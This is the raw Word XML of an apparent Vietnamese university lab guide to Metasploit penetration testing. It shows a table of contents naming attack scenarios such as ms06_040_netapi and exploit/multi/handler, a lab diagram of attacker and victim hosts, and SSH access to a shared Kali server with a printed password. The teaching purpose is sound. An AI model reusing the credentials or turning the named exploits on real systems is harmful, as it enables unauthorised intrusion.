            <w:r w:rsidRPr="00EB07DC" w:rsidR="007142BC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.1.</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Thực hành</w:t>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145594636 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007142BC" w:rsidRDefault="004A0A3F" w14:paraId="08BBB9B4" w14:textId="7F9EEA5A">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7">
            <w:r w:rsidRPr="00EB07DC" w:rsidR="007142BC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.2.</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NOTE Các lệnh chính</w:t>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145594637 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007142BC" w:rsidRDefault="004A0A3F" w14:paraId="24CFF4C0" w14:textId="6C8DE6B2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="782"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="2"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc145594638">
            <w:r w:rsidRPr="00EB07DC" w:rsidR="007142BC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.</w:t>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:kern w:val="2"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00EB07DC" w:rsidR="007142BC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Tham khảo thêm một số kịch bản tấn công trên WinXP, Win7</w:t>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145594638 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007142BC" w:rsidRDefault="004A0A3F" w14:paraId="58ED32BB" w14:textId="201740AA">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39">
            <w:r w:rsidRPr="00EB07DC" w:rsidR="007142BC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.1.</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ms06_040_netapi</w:t>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145594639 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007142BC" w:rsidRDefault="004A0A3F" w14:paraId="1EC006A1" w14:textId="7D6D3FDC">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1300"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="2"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc145594640">
            <w:r w:rsidRPr="00EB07DC" w:rsidR="007142BC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.2.</w:t>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:kern w:val="2"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00EB07DC" w:rsidR="007142BC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>exploit/multi/handler</w:t>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145594640 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidRPr="009B135C" w:rsidR="0022224F" w:rsidRDefault="0031173D" w14:paraId="31D4695A" w14:textId="47CB0808">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="782"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9629"/>
            </w:tabs>
            <w:rPr>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="009B135C">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidRPr="009B135C" w:rsidR="0022224F" w:rsidP="00CA4DC8" w:rsidRDefault="0031173D" w14:paraId="3CDA7DEF" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc1947175388" w:id="3"/>
      <w:bookmarkStart w:name="_Toc145594621" w:id="4"/>
      <w:r w:rsidRPr="009B135C">
        <w:t>Giới thiệu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="008E3F20" w:rsidP="00B0044D" w:rsidRDefault="008E3F20" w14:paraId="2790493D" w14:textId="6B57C89A">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc20454789" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidRPr="009B135C">
        <w:t xml:space="preserve">Metasploit Project là một công cụ dùng để tấn công xâm nhập kiểm thử (Penetration Testing) và phát triển các hệ thống phát hiện xâm nhập (Intrusion Detection System – IDS). Metasploit được tích hợp sẵn trong hệ điều hành Kali Linux. Ngoài ra NSD có thể phát triển mã nguồn mở. Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="00B0044D" w:rsidP="00B0044D" w:rsidRDefault="00B0044D" w14:paraId="63002B9F" w14:textId="77777777">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&gt;&gt; Yêu cầu chụp hình ảnh là kết quả thực hành của SV. Không sử dụng lại hình ảnh của bài lab.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="008E3F20" w:rsidP="008E3F20" w:rsidRDefault="00E32623" w14:paraId="63191A81" w14:textId="2D85B084">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc20454791" w:id="6"/>
      <w:bookmarkStart w:name="_Toc20454801" w:id="7"/>
      <w:bookmarkStart w:name="_Toc20454802" w:id="8"/>
      <w:bookmarkStart w:name="_Toc20808909" w:id="9"/>
      <w:bookmarkStart w:name="_Toc65834497" w:id="10"/>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Hệ thống mạng</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C" w:rsidR="008E3F20">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> thực hành ATTT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>có sơ đồ như sau</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C" w:rsidR="008E3F20">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="008E3F20" w:rsidP="008E3F20" w:rsidRDefault="008E3F20" w14:paraId="551ABA7A" w14:textId="53DCA345">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">* Máy Kali Linux (attacker):  </w:t>
      </w:r>
      <w:r w:rsidR="00F16D27">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Địa chỉ IP 192</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.168.1.10, tài khoản đăng nhập (masinhvien, masinhvien)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="008E3F20" w:rsidP="008E3F20" w:rsidRDefault="008E3F20" w14:paraId="7D70BE92" w14:textId="4EFFC1CC">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XP (victim):  </w:t>
      </w:r>
      <w:r w:rsidR="00F16D27">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Địa chỉ IP 192</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.168.1.110, 192.168.1.111</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="008E3F20" w:rsidP="008E3F20" w:rsidRDefault="008E3F20" w14:paraId="694BE896" w14:textId="423BCE6D">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7 (victim):  </w:t>
      </w:r>
      <w:r w:rsidR="00F16D27">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Địa chỉ IP 192</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.168.1.120, 192.168.1.121</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="008E3F20" w:rsidP="008E3F20" w:rsidRDefault="008E3F20" w14:paraId="2026C4F2" w14:textId="21F35FED">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:t>Các m</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">áy Win10 (victim):  </w:t>
      </w:r>
      <w:r w:rsidR="00F16D27">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Địa chỉ IP 192</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.168.1.130, 192.168.1.111</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="00DE0889" w:rsidP="7C6BFC6E" w:rsidRDefault="00DE0889" w14:paraId="150FD3D8" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtHinhVe"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:object w:dxaOrig="13894" w:dyaOrig="5093" w14:anchorId="18CD3FA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59.25pt;height:131.25pt" o:ole="" type="#_x0000_t75">
            <v:imagedata o:title="" r:id="rId8"/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1756815348" r:id="rId9"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="00DE0889" w:rsidP="00DE0889" w:rsidRDefault="00DE0889" w14:paraId="1B3EC7B5" w14:textId="0D27710B">
      <w:pPr>
        <w:pStyle w:val="txtHinhCaption"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:instrText>STYLEREF 1 \s</w:instrText>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="009B135C" w:rsidR="006A7120">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:instrText>SEQ Hình_ \* ARABIC \s 1</w:instrText>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="009B135C" w:rsidR="006A7120">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:t>. Sơ đồ hệ thống mạng thực hành</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="008E3F20" w:rsidP="00CA4DC8" w:rsidRDefault="008E3F20" w14:paraId="5B0F3D5A" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc787505629" w:id="11"/>
      <w:bookmarkStart w:name="_Toc145594622" w:id="12"/>
      <w:r w:rsidRPr="009B135C">
        <w:t>Truy cập từ xa đến Kali Linux</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="008E3F20" w:rsidP="008E3F20" w:rsidRDefault="008E3F20" w14:paraId="72B17F28" w14:textId="522BC322">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Hlk143872413" w:id="13"/>
      <w:r w:rsidRPr="009B135C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Cách 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dùng lệnh ssh</w:t>
      </w:r>
      <w:r w:rsidR="00EB36C7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="008E3F20" w:rsidP="008E3F20" w:rsidRDefault="008E3F20" w14:paraId="1E681D17" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">+ Từ Windows, vào menu Start =&gt; run, gõ lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="008E3F20" w:rsidP="008E3F20" w:rsidRDefault="008E3F20" w14:paraId="1B30C310" w14:textId="7A84BA8D">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C" w:rsidR="006A7120">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Thực hiện</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C" w:rsidR="006A7120">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">các </w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>lệnh sau:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="00DC5E1A" w:rsidP="009F5AB1" w:rsidRDefault="00DC5E1A" w14:paraId="5369D9FE" w14:textId="7B6CE98E">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>C:\Users\myname&gt; del .ssh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="008E3F20" w14:paraId="38B81022" w14:textId="32CD978E">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="008E3F20">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>C:\Users\</w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="00DC5E1A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>myname</w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="008E3F20">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="00DC5E1A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="008E3F20">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ssh &lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="008E3F20">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>masinhvien</w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="008E3F20">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>&gt;@</w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="026CC99B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>wandertour</w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="00922E37">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.ddns.net</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00841EC1" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="084FC198" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="00841EC1">
        <w:t>&lt;masinhvien&gt;@113.171.168.165's password: 123456</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00841EC1" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="76C2A481" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="00841EC1">
        <w:t>Linux kali 4.19.0-kali1-amd64 #1 SMP Debian 4.19.13-1kali1 (2019-01-03) x86_64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00841EC1" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="242DE339" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="00841EC1">
        <w:t xml:space="preserve">   ______________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00841EC1" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="0F72CD03" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="00841EC1">
        <w:t xml:space="preserve">  /  _  \__    ___/\__    ___/\__    ___/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00841EC1" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="422FB49F" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="00841EC1">
        <w:t xml:space="preserve"> /  /_\  \|    |     |    |     |    |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00841EC1" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="3B310B02" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="00841EC1">
        <w:t>/    |    \    |     |    |     |    |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00841EC1" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="63801DFF" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="00841EC1">
